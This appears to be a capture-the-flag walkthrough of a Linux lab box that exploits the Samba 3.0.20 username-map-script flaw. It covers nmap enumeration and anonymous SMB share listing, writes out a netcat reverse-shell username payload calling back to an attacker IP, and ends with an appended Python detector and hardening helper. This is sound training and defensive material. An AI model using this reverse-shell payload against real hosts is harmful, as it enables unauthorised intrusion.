As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on those open ports.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
-sS use the TCP SYN scan option. This scan type is relatively unobtrusive and stealthy, since it never completes the TCP handshake.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scan the entire port range, from 1 to 65535.
-T5 insane mode, the fastest of nmap's timing templates.
-Pn assume the host is online (skip host discovery).
-n scan without reverse DNS resolution.
-oN save the scan result to a file in normal output format, in this case the allPorts file.
# Nmap 7.92 scan initiated Tue Jan 4 23:19:29 2022 as: nmap -p- -sS --min-rate 5000 -T5 -n -Pn -oN allPorts 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.048s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
# Nmap done at Tue Jan 4 23:19:56 2022 -- 1 IP address (1 host up) scanned in 26.84 seconds
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans those ports in more depth and saves the result to a file:
We can see there is an exploit that we could use; let's try it. To copy the exploit script to the current folder, we just need to run searchsploit with the -m option followed by the exploit path:
searchsploit -m unix/remote/49757.py
If we execute the exploit with the IP address of the target machine, we will see that nothing happens.
python 49757.py 10.10.10.3
No worries, let's look for other ways to gain access to the machine. If we look at the nmap scan, we can see that ports 139 and 445 are open. These ports are usually used by the SMB service. nmap also reported the version of the SMB service, which is Samba smbd 3.0.20-Debian. Once again, let's look for any exploit associated with that version using searchsploit.
It looks like there are some interesting exploits. Let's inspect the Metasploit one.
searchsploit -x unix/remote/16320.rb
If we take a look at the script, we can see that the only thing it does is log in to the SMB server with the username "/=`nohup payload`". Let's try to exploit this vulnerability manually.
First, we will need to try to list shares.
smbclient -L //10.10.10.3/ -N
-L get a list of shares available on the host.
-N use a null session; do not prompt for a password.
If you get this error, try adding the following option to the command:
--option="client min protocol=NT1"
Let's run the final command in order to list shares:
smbclient -L //10.10.10.3/ -N --option="client min protocol=NT1"
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
We are able to list shares successfully. It's time to get a shell. The idea is to connect to the tmp share and log in with the malicious username.
First of all, we have to set a netcat listener:
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP addresses, no DNS resolution.
-p specify the port to listen on.
We connect to the tmp share and then log in with the username "/=`nohup nc -e /bin/bash 10.10.14.7 4444`" to get a reverse shell.
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1"
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
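As an added defender-side example (not part of the original walkthrough): the flaw abused above is Samba's "username map script" option handing the supplied username to a shell, so the two things worth checking on a host running this Samba version are whether that option is set in smb.conf and whether authentication logs show usernames carrying shell metacharacters. The smb.conf snippet, the simplified log format and the script path are constructed assumptions, not taken from the box.

```python
import re

# Constructed sample of a Samba 3.0.x smb.conf; "username map script" is the
# directive that passes the client-supplied username to a shell.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   username map script = /etc/samba/scripts/mapusers.sh
"""

# Constructed log lines in a simplified smbd-style format (real smbd output
# varies with log level); the username is the token between "user=" and " share=".
SAMPLE_AUTH_LOG = [
    "[2022/01/04 23:20:01] smbd: auth request user=alice share=tmp",
    "[2022/01/04 23:20:05] smbd: auth request user=/=`nohup nc -e /bin/bash 10.10.14.7 4444` share=tmp",
    "[2022/01/04 23:20:09] smbd: auth request user=bob share=opt",
]

# Shell metacharacters that have no business in an SMB username.
SHELL_METACHARS = re.compile(r"[`$;|&<>\n]")
USER_RE = re.compile(r"\buser=(.*?) share=")


def username_map_script_enabled(smb_conf_text):
    """Return the configured 'username map script' value, or None if unset or commented out."""
    for line in smb_conf_text.splitlines():
        stripped = line.strip()
        if stripped.startswith((";", "#")):
            continue
        key, sep, value = stripped.partition("=")
        if sep and key.strip().lower() == "username map script":
            return value.strip()
    return None


def suspicious_usernames(log_lines):
    """Return (line_number, username) pairs whose username contains shell metacharacters."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = USER_RE.search(line)
        if match and SHELL_METACHARS.search(match.group(1)):
            hits.append((number, match.group(1)))
    return hits


def hardened_smb_conf(smb_conf_text):
    """Return smb.conf text with any 'username map script' line commented out."""
    out = []
    for line in smb_conf_text.splitlines():
        key = line.strip().partition("=")[0].strip().lower()
        if key == "username map script":
            out.append("# " + line.strip() + "   # disabled: passes usernames to a shell")
        else:
            out.append(line)
    return "\n".join(out) + "\n"
```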